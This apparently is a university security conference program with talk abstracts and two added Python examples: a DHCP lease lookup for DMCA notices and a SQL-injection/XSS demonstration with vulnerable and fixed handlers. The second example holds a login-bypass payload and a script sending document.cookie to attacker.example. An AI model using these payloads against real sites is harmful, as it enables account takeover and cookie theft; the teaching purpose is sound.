
Higher Education Copyright and Bandwidth Practices
Elliot Kendall
(Brandeis University)
In November, I ran a survey of policies and practices for
copyright/DMCA issues and bandwidth management in the higher education
community. The results I published didn't include much analysis in
order to avoid political fallout, but the data can teach us a lot about
what is and is not effective and how reality differs from the story
that often appears in the media.
Slides from the presentation
Automated DMCA Complaint Processing
Joel Rosenblatt
(Columbia University)
When processing DMCA takedown notices got to the point of taking up
one FTE, we decided it was time to automate. We have developed
a fully automated process, from intake of the complaint email, validating the
complaint, converting IP/time to MAC address, ticket generation,
capture and verification of the student, a copyright quiz and, finally, a
report to the appropriate dean.
I got my FTE back and we have discovered some very interesting things
about the timestamps that are sent with the notices.
Slides from this presentation
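The abstract above describes one stage that every such pipeline needs and that the timestamps complicate: turning the complaint's IP address and time into the MAC address that held the lease at that instant. The block below is an added example written for this page; it is not the conference's or Columbia's own tooling. The notice layout, the DHCP lease log and the table of time-zone abbreviations are all constructed for illustration, and the example refuses a timestamp whose zone is missing or unrecognised rather than guessing, since the same clock reading in two zones can point at two different students.

```python
"""Added example, not the conference's or Columbia's own code: the
IP address / timestamp to MAC address step of an automated DMCA
pipeline, run against DHCP lease records. The notice format, the
lease log and the time-zone table are assumptions for illustration."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed notice text in the style of an automated complaint; the
# address, port and time are made up.
SAMPLE_NOTICE = """\
Infringement Details
IP Address: 10.20.30.40
Port: 6881
Timestamp: 2007-11-14 22:15:07 PST
Protocol: BitTorrent
"""

# Constructed DHCP lease log: ip, mac, lease start, lease end, all in UTC.
SAMPLE_LEASES = [
    ("10.20.30.40", "00:11:22:33:44:55", "2007-11-14 20:00:00", "2007-11-15 04:00:00"),
    ("10.20.30.40", "66:77:88:99:aa:bb", "2007-11-15 04:00:00", "2007-11-15 12:00:00"),
    ("10.20.30.41", "cc:dd:ee:ff:00:11", "2007-11-14 20:00:00", "2007-11-15 04:00:00"),
]

# Zone abbreviations this pipeline is willing to interpret (assumed table,
# deliberately small; anything else is rejected rather than guessed).
TZ_OFFSETS = {
    "UTC": 0, "GMT": 0,
    "EST": -5, "EDT": -4, "CST": -6, "CDT": -5,
    "MST": -7, "MDT": -6, "PST": -8, "PDT": -7,
}

NOTICE_RE = re.compile(
    r"IP Address:[ \t]*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}).*?"
    r"Timestamp:[ \t]*(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})"
    r"(?:[ \t]+(?P<tz>[A-Z]{3,4}))?",
    re.S,
)


@dataclass
class Lease:
    ip: str
    mac: str
    start: datetime  # UTC, inclusive
    end: datetime    # UTC, exclusive


def _utc(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def load_leases(rows):
    return [Lease(ip, mac, _utc(start), _utc(end)) for ip, mac, start, end in rows]


def parse_notice(text):
    """Return (ip, UTC datetime). Refuses a timestamp whose zone is missing or unknown."""
    m = NOTICE_RE.search(text)
    if not m:
        raise ValueError("notice has no IP address and timestamp")
    tz = m.group("tz")
    if tz is None:
        raise ValueError("timestamp carries no time zone; refusing to guess")
    if tz not in TZ_OFFSETS:
        raise ValueError(f"unknown time zone abbreviation {tz!r}")
    local = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
    aware = local.replace(tzinfo=timezone(timedelta(hours=TZ_OFFSETS[tz])))
    return m.group("ip"), aware.astimezone(timezone.utc)


def mac_for(ip, when, leases):
    """MAC that held `ip` at UTC instant `when`, or None if no lease covers it."""
    hits = [l for l in leases if l.ip == ip and l.start <= when < l.end]
    if len(hits) > 1:
        raise ValueError("overlapping leases for one address; review the DHCP log by hand")
    return hits[0].mac if hits else None


def resolve_notice(text, leases):
    ip, when = parse_notice(text)
    return mac_for(ip, when, leases)


def resolve_ignoring_zone(text, leases):
    """The mistake to avoid: read the clock time as if it were already UTC."""
    m = NOTICE_RE.search(text)
    when = _utc(m.group("ts"))
    return mac_for(m.group("ip"), when, leases)


if __name__ == "__main__":
    leases = load_leases(SAMPLE_LEASES)
    print("correct:", resolve_notice(SAMPLE_NOTICE, leases))
    print("zone ignored:", resolve_ignoring_zone(SAMPLE_NOTICE, leases))
```

With the constructed data the correct conversion (22:15:07 PST is 06:15:07 UTC the next day) lands on the second lease, while reading the clock time as UTC lands on the first lease and would have a different student answering the copyright quiz. Everything downstream of this step (ticket, dean's report) inherits that error, which is why the lookup refuses to proceed without a zone.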
Security Breach Notification Laws
Ron Weikers, Esq. (Weikers & Co. | Software-Law.com)
Ron Weikers will discuss the new Massachusetts data security breach notification law, as well as other state data security breach notification laws. He will also discuss a recent legal trend that tends to establish a duty of care by companies that handle personal data.
Slides from the presentation:
State Security Breach Notification Laws 2007 (Word Document)
Mass Security Breach Law (PDF File)
Computer Intrusion and Cyber Crime Investigations
Jim Burrell
(Federal Bureau of Investigation)
This session will provide an overview of criminal and terrorist
exploitation of technology, investigative and forensic response,
technical and investigative challenges, and investigative coordination
between academic institutions and law enforcement. The recent trends
and results of the FBI Computer Crime Survey will be discussed. This
session will also include recent FBI investigative case presentations.
Slides from this presentation are not yet available. The video that
was shown during the presentation is available directly from CNN here.
Web Application Attack Vectors
Sherri Davidoff (Intelguardians)
Web application development in the university environment is often
very decentralized. Some applications are designed by central IT
staff, but more often than not, students and research groups set
up their own web applications, to suit their individual needs. Developers
(and sometimes university security staff) often do not realize that
flaws in their web applications can be leveraged to launch effective
attacks against other university internal applications and systems.
In this talk, we will review a couple of common web application attack
vectors, such as Cross-Site Scripting (XSS) and SQL injection, and
discuss in detail how they can be used to execute increasingly sophisticated
attacks. We will begin with very simple attacks that illustrate the
principles, and then move on to show how XSS and/or SQL injection
can be used to run commands on the host system, enumerate browser
history, exploit administrative applications, port scan other systems
on the network, and more.
We will pay special attention to Web 2.0 technology, defining the
term and technologies such as AJAX, and discussing the ways in which
Web 2.0 heightens web application security issues.
This talk will provide university security staff with a better understanding
of how vulnerabilities in individual web applications threaten the
security of the entire network infrastructure.
Slides from the presentation
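The two vectors named in the Web Application Attack Vectors abstract above, shown at their simplest: a login handler that splices user input into SQL beside its parameterized form, and a comment renderer that reflects user text into HTML beside its escaped form. This block is an added example written for this page, not code from the talk or from Intelguardians; the table, its rows, the payloads and the placeholder hostname are constructed. It shows the injection points themselves, not the escalations (host commands, port scanning) the talk goes on to cover.

```python
"""Added example, not from the talk or Intelguardians: the two attack
vectors the abstract names, SQL injection and cross-site scripting,
each as a vulnerable handler beside its fixed form. The table, rows and
payloads are constructed; only the standard library is used."""
import html
import sqlite3


def make_db():
    """In-memory users table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "student"), ("admin", "hunter2", "admin")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Query built by concatenation: the attacker's text becomes SQL syntax."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_fixed(conn, username, password):
    """Parameterized query: values travel separately from the statement."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Closes the username literal and comments out the password test, so the
# vulnerable query reads: ... WHERE username = 'admin' --' AND password = ''
SQLI_PAYLOAD = "admin' --"


def render_comment_vulnerable(comment):
    """Reflects user text into the page verbatim."""
    return "<p>" + comment + "</p>"


def render_comment_fixed(comment):
    """Escapes <, >, &, and quotes so the text is displayed, not interpreted."""
    return "<p>" + html.escape(comment, quote=True) + "</p>"


# A stored-XSS payload: a script that would ship the viewer's cookie to
# an attacker-controlled host (placeholder hostname, constructed).
XSS_PAYLOAD = (
    '<script>new Image().src="https://attacker.example/c?"'
    "+document.cookie</script>"
)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, SQLI_PAYLOAD, ""))  # admin row, no password
    print("fixed login:     ", login_fixed(db, SQLI_PAYLOAD, ""))       # None
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_fixed(XSS_PAYLOAD))
```

The vulnerable login returns the admin row for an empty password because the payload turns the rest of the WHERE clause into a comment; the parameterized version looks for a user literally named `admin' --` and finds nothing. The same division applies to the renderer: `html.escape` is the output-side counterpart of the bound parameter, and both fixes work without trying to recognise "bad" input.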
DIY Web Application Assessments
Phil Rodrigues (NET2S)
Are you concerned about the security of your organization's web
applications? Was your yearly budget exhausted hiring an external
firm to perform just one vulnerability assessment? Don't want to pay
the five-figure price tag for an automated web application scanner?
Don't Panic! This talk will describe easy ways to test web
applications for the most common security vulnerabilities using free
or open-source tools (or none at all). I will also cover common
industry testing methodologies and various ways that other
organizations integrate security testing into their software
development and acquisition life-cycles.
Slides: Phil has requested that anyone interested in having a copy
of his slides contact him directly. To help Phil avoid spam, I have
encoded his e-mail in ROT-13 format. So after you decode it, you
can e-mail him at cuvy.ebqevthrf [ng] tznvy.pbz.
PCI and Departmental Security Review
Randy Marchany
(Virginia Tech)
VA Tech started doing Payment Card Industry (PCI) self-assessments of
University departments that handle credit card transactions. These PCI
self-assessments are being done in anticipation of a full, official PCI audit
of the University. This talk describes the process and tools used to perform
these "audits". Examples of modified PCI assessment questionnaires and other
documents will be shown.
Slides from the presentation
Building Security Standards
Daniel Adinolfi (Cornell University)
and Brian Smith Sweeney (New York University)
Daniel Adinolfi and Brian Smith Sweeney were kind enough to provide
us with a replacement presentation which they just happened to have.
We were very appreciative of this last minute addition to our program.
Slides from this presentation